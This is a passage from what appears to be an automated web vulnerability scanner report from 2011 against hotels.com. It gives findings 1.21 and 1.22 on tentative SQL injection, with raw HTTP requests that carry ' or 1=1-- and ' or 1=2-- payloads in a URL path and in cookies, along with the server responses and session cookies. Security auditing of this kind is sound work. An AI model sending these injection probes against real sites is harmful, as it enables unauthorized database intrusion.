Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=5823045321059860'%20or%201%3d1--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:31:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:02 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:03 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h4>
<div class="property_details_reviews_trip_advisor">
<div class="overall_review clearfix">
<span class="overall">Overall rating:</span>
<span class="tripadvisor_owl_small"></span>
<span class="tripadvisor_rating tripadvisor_rating_40"><span class="bar"></span><span class="sprite"></span></span>
<span class="basedon">
Based on <em>1288</em> traveller reviews</span>
</div>
<h3>Most recent traveller reviews:</h3>
<div class="individual_review">
<span class="tripadvisor_rating tripadvisor_rating_30">
<span class="bar"></span>
<span class="sprite"></span>
</span>
<q class="title">"Amazing location, great lobby, small rooms"</q>
<div class="review_data">
<abbr title="10/01/11" class="date">10/01/11</abbr>
<span class="author">gopher2003</span>
<span class="location">Denver</span>
</div>
<p>
"If you are looking to spend very little time in the room, or you are travling alone and don't mind tight quarters, but location is your priority- this is the place for you. Parker House is on the Freedom Trail, located next to everything h
...[SNIP]...

Request 2

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=5823045321059860'%20or%201%3d2--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:31:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:03 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h4>
<div class="property_details_reviews_trip_advisor">
<div class="overall_review clearfix">
<span class="overall">Overall rating:</span>
<span class="tripadvisor_owl_small"></span>
<span class="tripadvisor_rating tripadvisor_rating_40"><span class="bar"></span><span class="sprite"></span></span>
<span class="basedon">
Based on <em>1288</em> traveller reviews</span>
</div>
<h3>Most recent traveller reviews:</h3>
<div class="individual_review">
<span class="tripadvisor_rating tripadvisor_rating_30">
<span class="bar"></span>
<span class="sprite"></span>
</span>
<q class="title">"Amazing location, great lobby, small rooms"</q>
<div class="review_data">
<abbr title="10/01/11" class="date">10/01/11</abbr>
<span class="author">gopher2003</span>
<span class="location">Denver</span>
</div>
<p>
"If you are looking to spend very little time in the room, or you are travling alone and don't mind tight quarters, but location is your priority- this is the place for you. Parker House is on the Freedom Trail, located next to everything historical and mere blocks from three different subway stops. You absolutly can't beat the location. That being said, the room is one of the smallest I've been in. It was clean, tighty and comfy if you don't need a lot of room. Also, its historical so translate that as thin walls."
</p>
</div>
<div class="clear-both"></div>
<div class="individual_review">
<span class="tripadvisor_rating tripadvisor_rating_40">
<span class="bar"></span>
<span class="sprite"></span>
</span>
<q class
...[SNIP]...

1.21. http://www.hotels.com/hoteldetails/urgencypopup.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 16779709'%20or%201%3d1--%20 and 16779709'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hoteldetails/urgencypopup.html16779709'%20or%201%3d1--%20?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:26 GMT
Content-Length: 41824
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:26 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKYa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAIe7QjZSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKYa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAIe7QjZSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
</ul>
</div>
<div class="main_links" role="navigation">
<ul class="main_nav">
<li class="first">
<a class="clickreport " href="http://www.hotels.com/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdIdFQlySAI6pZ0OApYg33RWfGOdA61bA-wBSA2wmJ5tO7Mb2DK2cjNZRnUiQucEIQ..">Hotels</a>
</li>
<li class="deals">
<a class="clickreport " href="http://www.hotels.com/deals/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikfV8l41X81B1pOxSsGx7JlPHtt9ZLXVa91DJ8ST8H1Lxi84a8_hhwLk.">Hotel Deals</a>
</li>
<li class="">
<a class="clickreport " href="http://www.hotels.com/hotel/packages.html" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdgvi0gfNwOUFOmxtlW1DoVWfGOdA61bA-wBSA2wmJ5tvGPLPCtG0u5xQQ2OuQoko
...[SNIP]...

Request 2

GET /hoteldetails/urgencypopup.html16779709'%20or%201%3d2--%20?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Content-Length: 41968
Date: Mon, 03 Oct 2011 00:29:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:26 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKUa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAJ-e43JSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKUa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAJ-e43JSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
</ul>
</div>
<div class="main_links" role="navigation">
<ul class="main_nav">
<li class="first">
<a class="clickreport " href="http://www.hotels.com/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdIdFQlySAI6pZ0OApYg33RWfGOdA61bA-wBSA2wmJ5tO7Mb2DK2cjNZRnUiQucEIQ..">Hotels</a>
</li>
<li class="deals">
<a class="clickreport " href="http://www.hotels.com/deals/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikfV8l41X81B1pOxSsGx7JlPHtt9ZLXVa91DJ8ST8H1Lxi84a8_hhwLk.">Hotel Deals</a>
</li>
<li class="">
<a class="clickreport " href="http://www.hotels.com/hotel/packages.html" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdgvi0gfNwOUFOmxtlW1DoVWfGOdA61bA-wBSA2wmJ5tvGPLPCtG0u5xQQ2OuQoko
...[SNIP]...

1.22. http://www.hotels.com/hoteldetails/urgencypopup.html [mvthistory cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The mvthistory cookie appears to be vulnerable to SQL injection attacks. The payloads 12592570'%20or%201%3d1--%20 and 12592570'%20or%201%3d2--%20 were each submitted in the mvthistory cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US12592570'%20or%201%3d1--%20; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Cteonnt-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A200.0.0%3A198.0.0%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.0.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:01 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4xLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjAuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjAuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:01 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>

Request 2

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
